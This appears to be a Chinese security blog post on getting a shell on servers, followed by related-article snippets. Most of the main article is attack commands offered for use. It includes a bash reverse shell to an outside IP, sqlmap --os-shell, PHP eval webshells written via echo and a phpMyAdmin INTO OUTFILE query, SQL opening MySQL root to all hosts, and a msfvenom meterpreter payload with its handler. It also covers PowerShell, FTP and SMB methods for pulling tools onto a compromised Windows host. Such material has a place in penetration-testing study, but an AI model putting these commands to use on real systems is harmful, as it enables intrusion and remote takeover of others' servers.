获得shell的几种姿势

最新推荐文章于 2024-03-11 16:36:29 发布
最新推荐文章于 2024-03-11 16:36:29 发布
阅读量1.1k 收藏 5
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 安全 漏洞挖掘 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/tomyyyyyy/article/details/95789234
本文介绍了Windows提权及文件上传的方法。提权方面,包括通过sqlmap连接mysql获取shell、msf反弹、phpmyadmin管理界面查询生成webshll。文件上传方面,介绍了利用http、ftp、smb协议以及echo直接写文件等方式,适用于存在命令执行的Windows服务器。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

windows提权

1.通过sqlmap连接mysql获取shell

(1)直接连接数据库

sqlmap.py -d “mysql://root:123456@127.0.0.1:3306/mysql”–os-shell

(2)通过选择32位或者64位操作系统,获取webshell,执行

bash -i >& /dev/tcp/192.168.1.3/80800>&1

(3)反弹到服务器192.168.1.3,在实际中192.168.1.3为外网独立IP。

(4)通过echo命令生成shell:

echo?php@eval($_POST['chopper']);?>/data/www/phpmyadmin/1.php

如果能够通过phpmyadmin管理数据库,则可以修改host为“%”并执行权限更新,下面命令可参考:

use mysql;

update userset host =%where user = ‘root’;

FLUSHPRIVILEGES ;

注意:如果数据库中有多个host连接,修改时可能会导致数据库连接出问题。

2.通过msf反弹

(1)使用msfvenom生成msf反弹的php脚本木马,默认端口为4444:

msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.1.3 -f raw > test.php

(2)在独立IP或者反弹服务器上运行msf依次执行以下命令:

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 192.168.1.3  //192.168.1.3为反弹监听服务器IP

show options

run 0 或者exploit

(3)上传并执行php文件

将test.php上传到192.168.1.2服务器上面,访问后即可获取msf反弹shell

http:// 192.168.1.2:8080/test.php

3.通过phpmyadmin管理界面查询生成webshll

select ‘<?php @eval($_POST[cmd]);?>INTOOUTFILE ‘D:/work/WWW/antian365.php’

我们在做渗透测试的时候会经常遇到存在命令执行的Windows服务器,而且不能上传shell,唯一的入口就是命令执行,这种情况下,我们需要向服务器上传一个大一点的工具,如何实现,这就是本文章主要的内容。

利用http协议下载文件

利用vbs下载

将下面的代码保存为test.vbs

[外链图片转存失败(img-3N352k8n-1563021023687)(http://www.myh0st.cn/usr/uploads/2017/11/1127642178.png)]

执行如下语句:

cscript test.vbs

利用powershell下载

将如下代码保存为test.ps1

$p = New-Object System.Net.WebClient$p.DownloadFile("http://domain/file" "C:\%homepath%\file")

执行.test.ps1

有的时候PowerShell的执行权限会被关闭,需要使用如下的语句打开。

powershell set-executionpolicy unrestricted

利用ftp协议下载文件

1 创建一个ftp服务器,或者使用公共的ftp服务器

2 将下面的代码保存为test.txt

ftp 127.0.0.1
username
password
get fileexit

3 执行下面的命令

ftp -s:test.txt

利用smb协议拷贝文件

1 在公网创建一个共享如:\111.111.111.111test$

2 命令行下执行net use \111.111.111.111test$ /u:test test

3 最后上传文件到共享,命令行下拷贝:copy \111.111.111.111test$test.exe c:\

利用echo直接写文件

使用nishang的powershell工具包对上传的文件进行处理,然后使用echo到文件中,最后再转为原始文件。

下载地址:https://github.com/samratashok/nishang

具体操作步骤:

1 将文件转为hex

PS > .\ExetoText.ps1 evil.exe evil.txt

2 将hex的值echo到文件中

3 将hex转为原始文件

PS > .\TexttoExe.ps1 evil.text evil.exe

总结

这几种方式的利用场景是在我们发现一个服务器存在命令执行,而且还是一台Windows,在不依赖其他工具的前提下,使用Windows自带的命令将我们需要的工具上传到服务器的姿势。以上的脚本文件都可以使用echo 的方式保存到服务器上,然后再利用这些姿势上传大一点的工具等文件。欢迎大家补充各种姿势。

内网渗透-反弹shell的N种姿势
lza20001103的博客
09-04 998
反弹shell的N种姿势 文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat)反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言 在渗透测试的过程中,在拿到webshell以后,
通过命令下载执行恶意代码的几种姿势
08-20 2万+
在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。在目标主机执行恶意代码,可以分为上传/下载并执行恶意代...
不进后台拿shell的一种方法
08-12
不进后台拿shell的一种方法.zip.不进后台拿shell的一种方法.zip
Linux获得shell的方法大全
weixin_45441727的博客
03-15 1497
上传webshell 生成webshell msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw > /root/Desktop/shell.php 使用burpsuite将shell.php上传(上面jpg改格式的都会吧) 反弹shell1 制作监听脚本PHP msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw 然后
获取完美shell
em.....
06-01 902
微信公众号:小惜渗透,欢迎大佬一起交流进步 下面我将边演示边来介绍几种提升shell的方法,我这里面用的Linux虚拟机搭的DVWA靶场上传文件(吐槽一下,在windows上用小皮面板搭建一点问题没有,在Linux上可能因为权限的问题,文件上传那块正常的图片就死活传不上去,后来自己一顿调,本来都想放弃了,结果瞎调调好了)首先我这里用哥斯拉打开命令界面这时候可以通过方向上键回历史记录,但是一些需要交互的命令,如su或者vim都会执行失败,那么我们首先想到的肯定是反弹shell(反弹shell的命令大全,我公众
shell的一些方式
zdy8023的博客
04-06 7371
管理权限拿shell 需要有管理员权限才可以拿shell 如织梦cms 数据库备份拿shell 网站对上传的文件后缀进行过滤,不允许上传脚本类型文件如asp/php/jsp/aspx等 但是网站具有备份数据库备份功能,这时我们可以将webshell格式先将改为可允许上传的文件格式如jpg gif等 然后,我们找到上传后的文件路径,通过数据库备份,将文件备份为脚本格式 如动力文章 阉...
Linux提权的几种常用姿势
01-11 2万+
在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。 1、内核漏洞提权 提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,同时可以通过该漏洞实现Docker容器逃逸,获得root权限的shell。 1...
几种姿势运行mimikatz
小晓晓晓林的博客
01-21 5064
Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的神器,内网渗透中常用mimikatz获取明文密码或者获取hash值来漫游内网。但是在实际的运用中,常常会遇到杀软的拦截,所以这里我借鉴网上的资料,进行复现学习,达到免杀绕过的目的。有些方式没有复现成功我就没有写出来了,有一些成功之后似乎也会被拦截了。 姿势一:powershell ...
Windows提权的几种常用姿势
热门推荐
01-11 4万+
当获取主机权限时,我们总是希望可以将普通用户提升为管理员用户,以便获得高权限完全控制目标主机。Windows常用的提权方式有:内核提权、数据库提权、系统配置错误提权、组策略首选项提权、B...
45种可拿SHELL的方法
11-20
45种可拿SHELL的方法 free now~~~~~~~~~~~~~~~~~~~~~~~
教你如何拿下webshell
11-03
教你拿取webshell的45种方法,手动通过google hack技术及各种相应工具,让你找到上传点等其他很多漏洞上传木马拿到shell
一些拿shell技巧
weixin_34087307的博客
11-01 183
1.直接上传asp asa jsp cer php aspx htr cdx 格式的***,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2.有时上传图片格式的***,居然被程序检测拦截了,右键记事本打开***,在代码最前面加上gif89a,再数据库备份备份成asp格式的***拿下shell。3....
获取webshell的方法
gugonggugong的博客
01-16 827
一、管理员权限进后台 正常上传:网站对上传文件的后缀并未过滤,直接上传 数据库备份与恢复:网站对上传的文件后缀有过滤,但网站有数据库备份的功能,可以将WebShell格式先改为允许上传的文件格式,然后,我们找到上传后的文件路径,通过数据库备份,将文件备份为脚本格式。 数据库配置文件插码:往配置文件中写入木马 各种绕过姿势:00%截断;特殊后缀文件名绕过;文件名大小绕过 利用解析漏洞:利用低版本的中间件apache、ng...
网站后台拿shell方法总结
weixin_30929011的博客
04-04 374
今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能成为脚本妙手. 动网上传漏洞,信任大伙拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全国,现在这种漏洞已经根柢斗劲难见到了,不扫除一些小网站模拟仍是存在此漏洞。在拿站历程中,我们凡是费了九牛两虎之力拿到办理员帐号和密码,并顺遂进入了后台,当然此时与拿到网站webshell还有一步之遥...
获取Shell后的操作
墨鱼菜鸡
06-21 1434
对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同。 Windows 当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢? 第一步,先whoami 查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得...
shell程序执行方式(三种方式)
zhuo的博客
03-28 1万+
实验假设有一个脚本script.sh 使用BASH shell脚本内容#!/bin/bashname='Tim'echo 'finished'这个脚本创建了一个name变量,并给这个变量赋了一个值。等会我们将执行这个命令,执行完成之后我们试着单独echo这个变量,看看会有什么不同的结果。1.使用./script.sh2.使用bash script.sh 或者sh script.sh3.使用. sc...
【土木人自学网安Day6】shell及多种获取shell的方式
最新发布
qq_44117967的博客
03-11 2372
主要介绍:shell的基本概念,各类获取shell的工具,获取shell的payload生成器使用,获取加密shell免杀的方法、shell稳定化的办法......
获取shell执行结果,不创建实际文件
孤独小剑的专栏
09-06 1206
popen使用FIFO管道执行外部程序。 #include FILE *popen(const char *command, const char *type); int pclose(FILE *stream); popen 通过type是r还是w确定comm
shell变量类型有哪几种
06-28
### 回答1: 在shell中,变量类型主要有以下几种: 1. 字符串变量:用于存储字符串类型的数据,如文本、数字等。 2. 数组变量:用于存储多个值的变量,可以通过下标访问数组中的元素。 3. 环境变量:用于存储系统环境信息的变量,如PATH、HOME等。 4. 位置参数变量:用于存储命令行参数的变量,如$1、$2等。 5. 特殊变量:用于存储特殊信息的变量,如$?、$$等。 以上就是shell中常见的变量类型。 ### 回答2: 在Linux的Shell中,变量是指可以存储数据的命名内存区域,是shell编程中最基本的组成部分之一。根据变量的作用范围和数据类型的不同,可以将Shell变量分为如下几种类型: 1.本地变量 本地变量是定义在当前Shell进程中的变量,它的作用范围仅限于当前Shell进程中的子进程和当前进程。本地变量可以使用任意的变量名和变量值,定义方式是: 变量名=变量值 例如:name="Tom",这里定义了一个名为“name”的本地变量,它的值为“Tom”。 2.环境变量 环境变量是由Shell进程创建并传递给子进程的变量,它的作用范围包括当前进程和所有子进程。环境变量可以被所有程序访问,用于传递参数和设置系统环境。环境变量的定义方式是: export 变量名=变量值 例如:export PATH=$PATH:/usr/local/bin,这里定义了一个名为“PATH”的环境变量,它的值是当前PATH变量的值加上“/usr/local/bin”。 3.位置参数变量 位置参数变量是在Shell脚本中传递给脚本的参数,它们按顺序编号,从$1开始,$0变量表示当前脚本的名称。例如,执行脚本时,可以通过下面的命令传递参数: ./test.sh arg1 arg2 arg3 在脚本中可以使用$1、$2、$3等变量来获取对应位置的参数。 4.特殊变量 特殊变量是由Shell设定的,用于保存Shell的运行环境、状态信息和命令行参数等信息,具有特殊的含义。例如: $?:获取上一个命令的退出状态码(0表示成功,非0表示失败); $$:获取当前Shell进程的PID(进程ID); $!:获取后台运行的最后一个进程的PID; $#:获取命令行参数的个数。 综上所述,Shell变量类型主要有本地变量、环境变量、位置参数变量和特殊变量四种。在Shell脚本编程中,熟练使用不同类型的变量可以更好地掌握Shell脚本的编写技巧和使用方法。 ### 回答3: 在shell脚本中,变量是用来保存数据的一种机制,它将数据放入到一个被命名的位置,并且可以在脚本中被引用。在shell中,变量可以分为以下几种类型: 1. 环境变量 环境变量是在Shell启动时就已经定义好的,并提供给各个子进程,在shell脚本中使用这些变量可以获取各种系统信息,例如用户登录名、当前工作目录等等。一些常见的环境变量包括: - HOME:当前用户的家目录路径 - PATH:用于查找命令的路径 - LANG:系统当前的语言环境 2. 本地变量 本地变量是在shell脚本中定义的变量,只在该脚本内有效,无法被其他脚本或命令访问到。本地变量可以使用类似于以下的方式定义: ``` variable=value ``` 其中`variable`表示变量名,`value`则是该变量的值。 3. 位置参数变量 位置参数变量用于在脚本中传递参数,也可以在函数中使用。在shell中,可以使用`$0`表示当前脚本的名称,`$1`表示第一个参数,以此类推。例如,执行下面的命令将会输出“Hello, world!”: ``` echo "Hello, $1!" ``` 4. 特殊变量 特殊变量是在shell中预定义的,提供有关脚本状态和运行时环境的信息。一些常见的特殊变量如下: - $?: 上一条命令运行的状态码 - $$: 当前shell进程的ID - $!: 最近一个在后台运行的进程的ID 总之,在shell脚本中,变量类型有环境变量、本地变量、位置参数变量和特殊变量。针对不同的需要,程序员可以灵活使用这些变量类型,帮助自己更好地编写Shell脚本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值